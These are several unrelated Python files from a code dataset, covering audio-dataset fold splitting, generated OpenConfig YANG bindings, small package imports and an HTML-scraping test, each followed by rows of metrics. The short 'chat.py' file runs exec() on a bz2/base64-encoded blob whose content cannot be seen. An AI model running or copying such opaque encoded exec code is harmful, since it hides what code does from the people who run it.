annotation_filename = os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS',base_filename + '_v2.txt')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1],
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
else:
annotation_filename = os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS',base_filename + '.txt')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1],
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
# Construct training and testing sets. Isolated sound are used for training and
# polyphonic mixtures are used for testing.
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
files = []
for item in self.meta:
if item['file'] not in files:
files.append(item['file'])
files = numpy.array(files)
f = numpy.zeros(len(files))
sss = StratifiedShuffleSplit(y=f, n_iter=5, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
# print("TRAIN:", train_index, "TEST:", test_index)
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
writer.writerow([os.path.join(relative_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
fold += 1
| 39.71074 | 163 | 0.522395 | 8,385 | 78,389 | 4.681932 | 0.060942 | 0.034388 | 0.033878 | 0.036018 | 0.789673 | 0.763717 | 0.739238 | 0.728387 | 0.719599 | 0.699322 | 0 | 0.01357 | 0.368266 | 78,389 | 1,973 | 164 | 39.730867 | 0.779185 | 0.031943 | 0 | 0.625518 | 0 | 0.011599 | 0.138193 | 0.017868 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.000829 | 0.008285 | null | null | 0.004143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5d7d8c710d666b61c16e2e5105bdd7aa82be3827 | 47 | py | Python | dialogy/workflow/__init__.py | ayush-1506/dialogy | 2f688ad30ed14f220eb8ae1a7b82fbe04ad2edbf | [
"MIT"
] | 13 | 2021-09-09T15:18:08.000Z | 2022-03-15T10:02:59.000Z | dialogy/workflow/__init__.py | ayush-1506/dialogy | 2f688ad30ed14f220eb8ae1a7b82fbe04ad2edbf | [
"MIT"
] | 48 | 2021-01-14T21:06:28.000Z | 2021-08-30T07:23:51.000Z | dialogy/workflow/__init__.py | ayush-1506/dialogy | 2f688ad30ed14f220eb8ae1a7b82fbe04ad2edbf | [
"MIT"
] | 4 | 2021-01-18T11:19:49.000Z | 2021-08-06T05:52:17.000Z | from dialogy.workflow.workflow import Workflow
| 23.5 | 46 | 0.87234 | 6 | 47 | 6.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.953488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d7e1a706e3cc8d6412a019148304a83b1796563 | 65 | py | Python | pocportal/graphqlbase.py | Jumpscale/poc-portal | 6ddd7e004a588f9c6a5b72224b8713ebdff85691 | [
"Apache-2.0"
] | null | null | null | pocportal/graphqlbase.py | Jumpscale/poc-portal | 6ddd7e004a588f9c6a5b72224b8713ebdff85691 | [
"Apache-2.0"
] | 1 | 2017-10-03T13:46:03.000Z | 2020-06-17T14:19:50.000Z | pocportal/graphqlbase.py | Jumpscale/poc-portal | 6ddd7e004a588f9c6a5b72224b8713ebdff85691 | [
"Apache-2.0"
] | null | null | null | import graphene
class BaseQuery(graphene.ObjectType):
pass
| 10.833333 | 37 | 0.769231 | 7 | 65 | 7.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169231 | 65 | 5 | 38 | 13 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
5d864663b2439d30159ed2a567d4eeb70176df85 | 17,790 | py | Python | napalm_yang/models/openconfig/system/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 64 | 2016-10-20T15:47:18.000Z | 2021-11-11T11:57:32.000Z | napalm_yang/models/openconfig/system/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 126 | 2016-10-05T10:36:14.000Z | 2019-05-15T08:43:23.000Z | napalm_yang/models/openconfig/system/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 63 | 2016-11-07T15:23:08.000Z | 2021-09-22T14:41:16.000Z | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /system/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Global configuration data for the system
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__hostname",
"__domain_name",
"__login_banner",
"__motd_banner",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__hostname = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="hostname",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
self.__domain_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="domain-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
self.__login_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="login-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
self.__motd_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="motd-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return ["system", "config"]
def _get_hostname(self):
"""
Getter method for hostname, mapped from YANG variable /system/config/hostname (inet:domain-name)
YANG Description: The hostname of the device -- should be a single domain
label, without the domain.
"""
return self.__hostname
def _set_hostname(self, v, load=False):
"""
Setter method for hostname, mapped from YANG variable /system/config/hostname (inet:domain-name)
If this variable is read-only (config: false) in the
source YANG file, then _set_hostname is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hostname() directly.
YANG Description: The hostname of the device -- should be a single domain
label, without the domain.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="hostname",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """hostname must be of a type compatible with inet:domain-name""",
"defined-type": "inet:domain-name",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.', 'length': ['1..253']}), is_leaf=True, yang_name="hostname", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='inet:domain-name', is_config=True)""",
}
)
self.__hostname = t
if hasattr(self, "_set"):
self._set()
def _unset_hostname(self):
self.__hostname = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="hostname",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
def _get_domain_name(self):
"""
Getter method for domain_name, mapped from YANG variable /system/config/domain_name (inet:domain-name)
YANG Description: Specifies the domain name used to form fully qualified name
for unqualified hostnames.
"""
return self.__domain_name
def _set_domain_name(self, v, load=False):
"""
Setter method for domain_name, mapped from YANG variable /system/config/domain_name (inet:domain-name)
If this variable is read-only (config: false) in the
source YANG file, then _set_domain_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_domain_name() directly.
YANG Description: Specifies the domain name used to form fully qualified name
for unqualified hostnames.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="domain-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """domain_name must be of a type compatible with inet:domain-name""",
"defined-type": "inet:domain-name",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.', 'length': ['1..253']}), is_leaf=True, yang_name="domain-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='inet:domain-name', is_config=True)""",
}
)
self.__domain_name = t
if hasattr(self, "_set"):
self._set()
def _unset_domain_name(self):
self.__domain_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="domain-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
def _get_login_banner(self):
"""
Getter method for login_banner, mapped from YANG variable /system/config/login_banner (string)
YANG Description: The console login message displayed before the login prompt,
i.e., before a user logs into the system.
"""
return self.__login_banner
def _set_login_banner(self, v, load=False):
"""
Setter method for login_banner, mapped from YANG variable /system/config/login_banner (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_login_banner is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_login_banner() directly.
YANG Description: The console login message displayed before the login prompt,
i.e., before a user logs into the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="login-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """login_banner must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="login-banner", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='string', is_config=True)""",
}
)
self.__login_banner = t
if hasattr(self, "_set"):
self._set()
def _unset_login_banner(self):
self.__login_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="login-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
def _get_motd_banner(self):
"""
Getter method for motd_banner, mapped from YANG variable /system/config/motd_banner (string)
YANG Description: The console message displayed after a user logs into the
system. They system may append additional standard
information such as the current system date and time, uptime,
last login timestamp, etc.
"""
return self.__motd_banner
def _set_motd_banner(self, v, load=False):
"""
Setter method for motd_banner, mapped from YANG variable /system/config/motd_banner (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_motd_banner is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_motd_banner() directly.
YANG Description: The console message displayed after a user logs into the
system. They system may append additional standard
information such as the current system date and time, uptime,
last login timestamp, etc.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="motd-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """motd_banner must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="motd-banner", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='string', is_config=True)""",
}
)
self.__motd_banner = t
if hasattr(self, "_set"):
self._set()
def _unset_motd_banner(self):
self.__motd_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="motd-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
hostname = __builtin__.property(_get_hostname, _set_hostname)
domain_name = __builtin__.property(_get_domain_name, _set_domain_name)
login_banner = __builtin__.property(_get_login_banner, _set_login_banner)
motd_banner = __builtin__.property(_get_motd_banner, _set_motd_banner)
_pyangbind_elements = OrderedDict(
[
("hostname", hostname),
("domain_name", domain_name),
("login_banner", login_banner),
("motd_banner", motd_banner),
]
)
| 39.977528 | 541 | 0.572625 | 2,023 | 17,790 | 4.809689 | 0.106772 | 0.0148 | 0.024666 | 0.029599 | 0.811511 | 0.780781 | 0.77184 | 0.767729 | 0.762384 | 0.755807 | 0 | 0.01514 | 0.305734 | 17,790 | 444 | 542 | 40.067568 | 0.77265 | 0.187521 | 0 | 0.635015 | 0 | 0.029674 | 0.273618 | 0.117483 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041543 | false | 0 | 0.04451 | 0 | 0.130564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5d9a2539f53debec82909f71bd03be2744ae202d | 278 | py | Python | bin/bin/programs/chat.py | lukgth/poshy | e10d3b34648db4aa32a5697b59a03020fc677655 | [
"Apache-2.0"
] | null | null | null | bin/bin/programs/chat.py | lukgth/poshy | e10d3b34648db4aa32a5697b59a03020fc677655 | [
"Apache-2.0"
] | null | null | null | bin/bin/programs/chat.py | lukgth/poshy | e10d3b34648db4aa32a5697b59a03020fc677655 | [
"Apache-2.0"
] | null | null | null | # chat with other system users
import bz2, base64
print('Type `chat` to chat with somebody else on your system!')
exec(bz2.decompress(base64.b64decode('QlpoOTFBWSZTWdPB9nwAAA5bgAAQQOAAEgSAMmfegCAAQRT2o0jyaQGZQoNGjQZAaJfO+krzQldsEHdTNI89EvacwwLtZqMUtqBLGZX/F3JFOFCQ08H2fA==')))
| 46.333333 | 162 | 0.841727 | 27 | 278 | 8.666667 | 0.777778 | 0.068376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070039 | 0.07554 | 278 | 5 | 163 | 55.6 | 0.840467 | 0.100719 | 0 | 0 | 0 | 0 | 0.701613 | 0.483871 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5da3450022c0a0dc2675ad27b1e6fe3abc9d1ef1 | 209 | py | Python | alignmentrs/aln/__init__.py | kentwait/alignmentrs | ab4ed6bae7ad0f7961104baf914bb6b49dc28d88 | [
"MIT"
] | 1 | 2019-07-10T00:14:44.000Z | 2019-07-10T00:14:44.000Z | alignmentrs/aln/__init__.py | kentwait/alignmentrs | ab4ed6bae7ad0f7961104baf914bb6b49dc28d88 | [
"MIT"
] | 1 | 2019-02-12T07:01:32.000Z | 2019-02-12T07:01:32.000Z | alignmentrs/aln/__init__.py | kentwait/alignmentrs | ab4ed6bae7ad0f7961104baf914bb6b49dc28d88 | [
"MIT"
] | 3 | 2019-01-30T17:51:44.000Z | 2019-09-11T07:36:49.000Z | from alignmentrs.aln.classes import Alignment, CatAlignment
from alignmentrs.aln.funcs import fasta_file_to_alignment
__all__ = ['Alignment', 'CatAlignment'
'fasta_file_to_alignment',
]
| 29.857143 | 59 | 0.741627 | 23 | 209 | 6.304348 | 0.521739 | 0.206897 | 0.248276 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 209 | 6 | 60 | 34.833333 | 0.847953 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 0.110048 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5dc1faac333b06065ebe8e7da092302a3979b798 | 384 | py | Python | pycerberus/validators/__init__.py | FelixSchwarz/pycerberus | d38376a52e61516023a3de61d43ef3d225161c7e | [
"MIT"
] | null | null | null | pycerberus/validators/__init__.py | FelixSchwarz/pycerberus | d38376a52e61516023a3de61d43ef3d225161c7e | [
"MIT"
] | 4 | 2018-10-21T16:00:59.000Z | 2019-09-14T21:05:32.000Z | pycerberus/validators/__init__.py | FelixSchwarz/pycerberus | d38376a52e61516023a3de61d43ef3d225161c7e | [
"MIT"
] | null | null | null |
from pycerberus.validators.basic_numbers import *
from pycerberus.validators.checkbox import *
from pycerberus.validators.domain import *
from pycerberus.validators.foreach import *
from pycerberus.validators.email import *
from pycerberus.validators.matching_fields import *
from pycerberus.validators.oneof import *
from .regex import *
from pycerberus.validators.string import *
| 32 | 51 | 0.833333 | 45 | 384 | 7.066667 | 0.333333 | 0.352201 | 0.603774 | 0.660377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098958 | 384 | 11 | 52 | 34.909091 | 0.919075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8de9071e412cda1c59b4ab3ecf25d9c43c131d9 | 11,099 | py | Python | tests/test_load_body.py | jfunez/articles_meta | 70cb33363cd6862f3859ae2606f8db2e669d32d1 | [
"BSD-2-Clause"
] | null | null | null | tests/test_load_body.py | jfunez/articles_meta | 70cb33363cd6862f3859ae2606f8db2e669d32d1 | [
"BSD-2-Clause"
] | null | null | null | tests/test_load_body.py | jfunez/articles_meta | 70cb33363cd6862f3859ae2606f8db2e669d32d1 | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
import unittest
import os
import codecs
from processing import load_body
class LoadLicensesTest(unittest.TestCase):
def test_scrapt_body(self):
data = u"""<html><header></header><body><div class="content"><div class="index,en"><div class="title">Crazy <i>Title</i></div><p>Crazy Body</p><p>Really Crazy Body</p></div></div></body></html>"""
result = load_body.scrap_body(data, 'en')
self.assertEqual(result, '<div class="title">Crazy <i>Title</i></div><p>Crazy Body</p><p>Really Crazy Body</p>')
def test_regex_remove_links1(self):
import re
data = """<p>ref 1: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">Links</a> ]</p><p>ref 2: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">Links</a> ]</p>"""
result = load_body.REMOVE_LINKS_REGEX.sub(' ', data, count=0)
self.assertEqual(result, '<p>ref 1: </p><p>ref 2: </p>')
def test_regex_remove_links2(self):
import re
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_removed_links_2.html', 'r', encoding='utf-8').readlines()])
result = load_body.REMOVE_LINKS_REGEX.findall(data)
expected = [
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000172&pid=S0044-5967200900010001500001&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000174&pid=S0044-5967200900010001500002&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000176&pid=S0044-5967200900010001500003&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000178&pid=S0044-5967200900010001500004&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000180&pid=S0044-5967200900010001500005&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000182&pid=S0044-5967200900010001500006&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000184&pid=S0044-5967200900010001500007&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000186&pid=S0044-5967200900010001500008&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000188&pid=S0044-5967200900010001500009&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000190&pid=S0044-5967200900010001500010&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000192&pid=S0044-5967200900010001500011&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
